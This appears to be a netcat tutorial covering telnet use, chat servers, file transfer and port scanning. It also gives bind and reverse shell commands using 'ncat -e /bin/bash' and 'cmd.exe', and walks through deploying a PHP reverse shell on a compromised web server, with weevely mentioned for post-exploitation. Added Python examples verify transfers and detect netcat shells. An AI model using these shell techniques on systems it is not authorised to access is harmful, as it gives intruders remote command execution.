Never Ending Security

Netcat Tutorial for Beginners


Netcat is a terminal application that is similar to the telnet program but has a lot more features. It's a “power version” of the traditional telnet program. Apart from basic telnet functions it can do various other things, like creating socket servers to listen for incoming connections on ports, transferring files from the terminal, etc. So it is a small tool that is packed with lots of features. That is why it's called the “Swiss-army knife for TCP/IP”.

The netcat manual defines netcat as:

Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection you would need and has a number of built-in capabilities.

So basically netcat is a tool for doing bidirectional network communication over the TCP/UDP protocols. More technically speaking, netcat can act as a socket server or client and interact with other programs at the same time, sending and receiving data through the network. Such a definition sounds too generic and makes it difficult to understand what exactly this tool does and what it is useful for. This can be understood only by using and playing with it.

So the first thing to do would be to set up netcat on your machine. Netcat comes in various flavors, meaning it is available from multiple vendors, but most of them have similar functionality. On Ubuntu there are 3 packages called netcat-openbsd, netcat-traditional and ncat.

My preferred version is ncat. Ncat, developed by the Nmap team, is the best of all the netcats available and, most importantly, it's cross-platform and works very well on Windows.

Ncat – Netcat for the 21st Century

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Download and install netcat


The Windows version of netcat can be downloaded from
Simply download and extract the files somewhere suitable.

Or download the ncat Windows version


The Ubuntu synaptic package manager has the netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.

Project websites

Install on Ubuntu

$ sudo apt-get install netcat-traditional netcat-openbsd nmap

To use the netcat-openbsd implementation, use the “nc” command.
To use the netcat-traditional implementation, use the “nc.traditional” command.
To use nmap's ncat, use the “ncat” command.

In the following tutorial we are going to use all of them in different examples in different ways.

1. Telnet

The very first thing netcat can be used as is a telnet program. Let's see how.

$ nc -v 80

Now netcat is connected to on port 80 and it's time to send some message. Let's try to fetch the index page. For this type “GET index.html HTTP/1.1” and hit the Enter key twice. Remember, twice.

$ nc -v 80
Connection to 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<H1>302 Moved</H1>
The document has moved
<A HREF="">here</A>.

The output from has been received and echoed on the terminal.

2. Simple socket server

To open a simple socket server type in the following command.

$ nc -l -v 1234

The above command means: netcat listens on TCP port 1234. The -v option gives verbose output for better understanding. Now from another terminal try to connect to port 1234 using the telnet command as follows:

$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
ting tong

After connecting, we send some test messages like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.

$ nc -l -v 5555

Connection from port 5555 [tcp/rplay] accepted
ting tong

This is a complete Chatting System. Type something in netcat terminal and it will show up in telnet terminal as well. So this technique can be used for chatting between 2 machines.

Complete ECHO Server

Ncat with the -c option can be used to start an echo server.

Start the echo server using ncat as follows

$ ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done'

Now from another terminal connect using telnet and type something. It will be sent back with “[echo]” prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.

Note: netcat can be told to save the data to a file instead of echoing it to the terminal.

$ nc -l -v 1234 > data.txt

UDP ports

Netcat works with UDP ports as well. To start a netcat server on a UDP port, use the -u option.

$ nc -v -ul 7000

Connect to this server using netcat from another terminal

$ nc localhost -u 7000

Now both terminals can chat with each other.

3. File transfer

A whole file can be transferred with netcat. Here is a quick example.

One machine A – Send File

$ cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( )
Ncat: Listening on

In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal; instead it is piped, or fed, to ncat, which has opened a socket server on port 5555.

On machine B – Receive File

$ ncat localhost 5555 > happy_copy.txt

In the above command ncat will connect to localhost on port 5555 and whatever it receives will be written to happy_copy.txt.

Now happy_copy.txt will be a copy of happy.txt, since the data being sent over port 5555 is the content of happy.txt from the previous command.

Netcat will send the file only to the first client that connects to it. After that it's over.
And after the first client closes the connection, the netcat server will also close down.
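The listener/receiver pair from sections 2 and 3 modelled at the socket level, as an added example that is not from the tutorial: the listener serves one file to the first client and then exits, like `cat happy.txt | ncat -l -p 5555`, and the receiver writes whatever it reads, like `ncat localhost 5555 > happy_copy.txt`. It adds the check netcat itself never performs, a SHA-256 comparison of both ends, because a truncated transfer looks identical at the terminal. Loopback, an ephemeral port and the sample bytes are assumptions of the example.

```python
"""Added example (not the tutorial's code): the one-shot netcat file transfer over loopback."""
import hashlib
import socket
import threading


def serve_file_once(data: bytes, port: int = 0) -> tuple:
    """Listen on 127.0.0.1, send `data` to the first client only, then close the listener.
    Mirrors `cat happy.txt | ncat -l -p 5555`; port=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    bound = srv.getsockname()[1]

    def run() -> None:
        conn, _peer = srv.accept()          # only the first client is ever served
        with conn:
            conn.sendall(data)
            conn.shutdown(socket.SHUT_WR)   # EOF tells the receiver the file is complete
        srv.close()                         # like netcat: the listener goes away afterwards

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t, bound


def receive_file(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Connect and read until EOF: the `ncat host 5555 > happy_copy.txt` side."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as c:
        while True:
            buf = c.recv(4096)
            if not buf:
                break
            chunks.append(buf)
    return b"".join(chunks)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def transfer_and_verify(data: bytes) -> tuple:
    """Send `data` to a fresh listener, fetch it back and compare digests.
    Returns (intact, digest_of_copy); a short read would show up here as intact=False."""
    thread, port = serve_file_once(data)
    copy = receive_file("127.0.0.1", port)
    thread.join(timeout=5)
    return sha256_hex(copy) == sha256_hex(data), sha256_hex(copy)


if __name__ == "__main__":
    # Constructed stand-in for happy.txt.
    intact, digest = transfer_and_verify(b"happy happy joy joy\n" * 1000)
    print("intact" if intact else "CORRUPT", digest)
```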

4. Port scanning

Netcat can also be used for port scanning. However, this is not the proper use of netcat, and a more suitable tool like nmap should be used.

$ nc -v -n -z -w 1 75-85
nc: connect to port 75 (tcp) failed: Connection refused
nc: connect to port 76 (tcp) failed: Connection refused
nc: connect to port 77 (tcp) failed: Connection refused
nc: connect to port 78 (tcp) failed: Connection refused
nc: connect to port 79 (tcp) failed: Connection refused
Connection to 80 port [tcp/*] succeeded!
nc: connect to port 81 (tcp) failed: Connection refused
nc: connect to port 82 (tcp) failed: Connection refused
nc: connect to port 83 (tcp) failed: Connection refused
nc: connect to port 84 (tcp) failed: Connection refused
nc: connect to port 85 (tcp) failed: Connection refused

The “-n” parameter here prevents DNS lookup, “-z” makes nc not receive any data from the server, and “-w 1” makes the connection timeout after 1 second of inactivity.

5. Remote Shell/Backdoor

Ncat can be used to start a basic shell on a port of a remote system without needing SSH. Here is a quick example.

$ ncat -v -l -p 7777 -e /bin/bash

The above will start a server on port 7777 and will pass all incoming input to the bash command, and the results will be sent back. The command basically converts the bash program into a server. So netcat can be used to convert any process into a server.

Connect to this bash shell using nc from another terminal

$ nc localhost 7777

Now try executing any command like help, ls, pwd, etc.


On a Windows machine the cmd.exe (DOS prompt program) is used to start a similar shell using netcat. The syntax of the command is the same.

C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 1182

Now another console can connect using the telnet command.

Although netcat can be used to set up remote shells, it is not useful for getting an interactive shell on a remote system, because in most cases netcat would not be installed on the remote system.

The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.

6. Reverse Shells

This is the most powerful feature of netcat and the one hackers use it for most. Netcat is used in almost all reverse shell techniques to catch the reverse connection from the shell program on a hacked system.

Reverse telnet

First let's take an example of a simple reverse telnet connection. In an ordinary telnet connection the client connects to the server to start a communication channel.

Your system runs (# telnet server port_number)  =============> Server

Now using the above technique you can connect to, say, port 80 of the server to fetch a webpage. However, a hacker is interested in getting a command shell: the command prompt of Windows or the terminal of Linux. The command shell gives ultimate control of the remote system. But there is no service running on the remote server to which you can connect and get a command shell.

So when a hacker hacks into a system, he needs to get a command shell. Since it's not possible directly, the solution is to use a reverse shell. In a reverse shell the server initiates a connection to the hacker's machine and gives it a command shell.

Step 1 : Hacker machine (waiting for incoming connection)
Step 2 : Server ==============> Hacker machine

To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on the local machine, i.e. the hacker's machine.

machine A

$ ncat -v -l -p 8888
Ncat: Version 6.00 ( )
Ncat: Listening on :::8888
Ncat: Listening on

The above will start a socket server (listener) on port 8888 on the local machine/hacker's machine.

Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.

For any method to work, the hacker either needs to be able to execute arbitrary commands on the system or should be able to upload a file that can be executed by opening it from the browser (like a PHP script).

In this example we are not doing either of the above mentioned things. We shall just run netcat on the server as well to throw a reverse command shell, to demonstrate the concept. So netcat has to be installed on the server or target machine.

Machine B :

$ ncat localhost 8888 -e /bin/bash

This command will connect to machine A on port 8888 and feed in the input and output of bash, effectively giving a shell to machine A. Now machine A can execute any command on machine B.

Machine A

$ ncat -v -l -p 8888
Ncat: Version 5.21 ( )
Ncat: Listening on
Ncat: Connection from

In a real hacking/penetration testing scenario it's not possible to run netcat on the target machine. Therefore other techniques are employed to create a shell. These include uploading reverse shell PHP scripts and running them by opening them in a browser, or launching a buffer overflow exploit to execute a reverse shell payload.
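A detection view of the bind and reverse shells shown above, as an added example that is not from the tutorial: it scans a process listing for netcat invocations that hand a shell to the network (`-e /bin/bash`, `-e cmd.exe`, `-c 'bash ...'`) and for shells owned by the web-server account, which is what the PHP reverse shell later in this post leaves behind (the `uid=33(www-data)` shell). The `ps -eo user,pid,ppid,args` style listing, the 10.0.0.5 address and the binary/shell/user name sets are constructed for this example; the `-c` rule deliberately ignores the echo-server loop from section 2.

```python
"""Added detection example (not the tutorial's code); listing and name sets are constructed."""
import shlex
from typing import Optional

NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.exe"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
WEB_USERS = {"www-data", "apache", "nginx", "http"}   # accounts that should never own a shell

def _base(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def is_listening(argv: list) -> bool:
    # -l may be bundled with other short flags, e.g. `-ul` or `-lvp`
    return any(t == "--listen" or (t.startswith("-") and not t.startswith("--") and "l" in t[1:])
               for t in argv[1:])

def netcat_shell_reason(args: str) -> Optional[str]:
    """Why a command line looks like a netcat bind/reverse shell, or None."""
    try:
        argv = shlex.split(args)
    except ValueError:                      # unbalanced quotes: fall back to whitespace split
        argv = args.split()
    if not argv or _base(argv[0]) not in NETCAT_BINARIES:
        return None
    for i, tok in enumerate(argv[:-1]):
        if tok in ("-e", "--exec", "-c", "--sh-exec"):
            target = argv[i + 1]
            # `-c 'while ...; done'` (the echo server) is not a shell; `-c 'bash -i'` is
            if _base(target.split()[0]) in SHELLS:
                kind = "bind shell" if is_listening(argv) else "reverse shell"
                return f"{kind}: netcat executes {target}"
    return None

def web_user_shell(user: str, args: str) -> Optional[str]:
    if user in WEB_USERS and _base(args.split()[0]) in SHELLS:
        return f"shell running as web-server user {user}"
    return None

def find_suspicious(listing: str) -> dict:
    """Map PID -> reason for every row of a `ps -eo user,pid,ppid,args` listing."""
    hits = {}
    for line in listing.strip().splitlines()[1:]:          # skip the header row
        user, pid, _ppid, args = line.split(None, 3)
        reason = netcat_shell_reason(args) or web_user_shell(user, args)
        if reason:
            hits[int(pid)] = reason
    return hits

SAMPLE_PS = """\
USER      PID  PPID ARGS
root        1     0 /sbin/init
alice    2201  1880 ncat -v -l -p 7777 -e /bin/bash
alice    2240  1880 nc -l -v 1234
bob      3105  3000 ncat 10.0.0.5 8888 -e /bin/bash
www-data 4410  1203 /usr/sbin/apache2 -k start
www-data 4412  4410 /bin/sh -i
alice    5000  1880 ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done'
"""

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_PS))
```

On a live box the same function can be fed the output of `ps -eo user,pid,ppid,args`; the name sets are a starting point, not a complete list.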


So in the above examples we saw how to use netcat for different network activities like telnet, reverse shells, etc. Hackers mostly use it for creating quick reverse shells.

In this tutorial we covered some of the basic and common uses of netcat. Check out the Wikipedia article for more information on what else netcat can do.

Php reverse shell with netcat

Once you are able to gain access to a remote website or server such that you can upload an arbitrary file to it, the next thing you want to try is getting a shell on the system. If the system is running PHP then a PHP file can be uploaded to it which will give us a reverse shell. There are many web based shell scripts, but getting a terminal based shell is far neater.

To get a shell on the system all we need is a reverse shell PHP script and a command-line tool called netcat. There are many PHP reverse shell scripts out there and we are going to try a few of them in this post. The first one that we are going to try is from pentestmonkey. You can download it from the website or check this gist.

Along with that PHP script you need netcat. I prefer the ncat utility from the nmap suite, which is very featureful and cross-platform as well. Along with those 2 things you should also have apache+php installed to test the script and understand how it works.

So first of all start a netcat listener. Reverse shells are based on the principle that the remote or hacked system will connect back to you. This back connection is accepted and handled by the netcat listener. Usage is simple:

$ ncat -vv -n -l -p 1234

The above command is going to start a netcat listener on port number 1234. The l option means listen, the n option means no DNS resolution, the p option means the port number and the vv option means verbose 2x. Once the listener starts, ncat would report something like this:

Ncat: Version 6.00 ( )
Ncat: Listening on :::1234
Ncat: Listening on

The next thing to do is initiate the PHP script. Copy the PHP reverse shell script you downloaded in the step above to your Apache web directory so that you can access it from the browser. The script needs 2 important configuration values: the IP address and the port number it needs to connect to.

$VERSION = "1.0";
$ip = '';           // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;

Change the IP address to the IP address of your own machine, i.e. the machine on which netcat is running. In our case it's localhost, so that would do. The port number should be the port netcat is listening on.

Now launch the script from a browser by opening the URL http://localhost/reverse.php, where reverse.php is the name of the script. The moment the script is opened in the browser, netcat should receive the connection and show the details like this:

Ncat: Connection from
Ncat: Connection from
Linux enlightened-desktop 3.5.0-26-generic #42-Ubuntu SMP Fri Mar 8 23:18:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 17:15:46 up  7:04,  4 users,  load average: 0.08, 0.09, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
enlighte tty7     :0               10:11    7:04m  5:18   0.05s /bin/sh /usr/bi
enlighte pts/0    :0               10:12   25:49   0.07s  0.00s ncat -vv -n -l
enlighte pts/3    :0               10:12    7:03m  0.00s  4.32s kdeinit4: kded4
enlighte pts/4    :0               17:15    0.00s  0.07s  0.00s wget http://loc
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

The last dollar sign indicates that the sh shell is ready to accept and run commands. The netcat output also shows some system details.

The browser won't show any output and would appear to load forever. The browser window can be closed and the shell would still remain running. This is because the script actually creates a separate process for the shell by forking. If you don't have a browser to trigger the PHP script, then use a command-line utility like wget to trigger it.

$ wget http://localhost/reverse.php
--2013-04-12 17:15:46--  http://localhost/reverse.php
Resolving localhost (localhost)...
Connecting to localhost (localhost)||:80... connected.
HTTP request sent, awaiting response...

Just like the browser, wget will keep waiting for some output from the script. Once netcat receives the connection, close the wget session as well.

Other php reverse shell scripts

There is another PHP reverse shell script hosted at github. Find it here. It generates a password protected reverse shell script using a username/password configuration. Other configuration options include the IP address and the port. Upload it to the target system and launch it from the browser.

And then comes the most powerful one, called weevely.

Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks.

Weevely has lots more built-in features that can automate various post-exploitation tasks. In short, it is more than just a console. Check it out here.


Since the PHP script connects back to us, it is important that no firewall on our own system blocks it. For example, a firewall like firestarter on Linux or zonealarm on Windows might block incoming connections like that. So first make sure that the ports on your local system are reachable and connectable. Also, if you are on a LAN behind a router then you need to configure port forwarding properly.

To test your ports, after launching the netcat listener use this port testing tool. If your ports are connectable from the outer internet then they are OK.

Check port forwarding with netcat

Port forwarding is a configuration in the router of a LAN such that any connection to a specific port number on the public/WAN IP of the router is forwarded to a specific machine/IP inside the LAN. Most routers have configuration options to set up port forwarding.

After setting up port forwarding it's necessary to check whether it's working or not. To check port forwarding, 2 things are necessary:

1. An application on local computer must open the port and wait for connections.
2. A machine from the outer network/internet must try to connect to this port number via the router.

If the connection succeeds then port forwarding is working. Let's take an example. A LAN has a router and 2 PCs with IP addresses and respectively. Now the router is configured to forward port 5000 to machine

Now to test that port forwarding we first need to start an application on machine that will open port 5000. We can use the program called netcat for this. Just run the following command:

$ nc -vv -l 5000

This will make netcat listen on port 5000. Now use a remote website to connect to this port using the public IP address of the router. A few free tools are

Just enter your public IP address and the port number and click Check. If the website shows success then the netcat terminal will show a new connection message like the following:

$ nc -vv -l 6000
Connection from port 6000 [tcp/x11] accepted

This will confirm that port forwarding is working. If the website shows that the port is closed then netcat too would not show any such connection message, indicating that port forwarding to that particular port is not working.

There may be a number of reasons why port forwarding didn't work. One common reason is the existence of a firewall on the local system, for example zonealarm on Windows, or firestarter on Ubuntu/Linux. Firewalls block incoming connections on local machines and need to be configured properly. So configure your firewall to allow incoming connections to the particular port.

Udp telnet with netcat

The standard telnet utilities that ship with Linux or Windows allow you to telnet to services running on TCP ports. They do not support UDP ports. However, the utility netcat can be used for working with UDP ports in a very similar manner to the default telnet utility.

The telnet utility works like this:

$ telnet localhost 7000

where localhost is the hostname and 7000 is the port number. For UDP ports the syntax for netcat is very similar:

$ netcat localhost 7000 -u

The -u option indicates a UDP port.

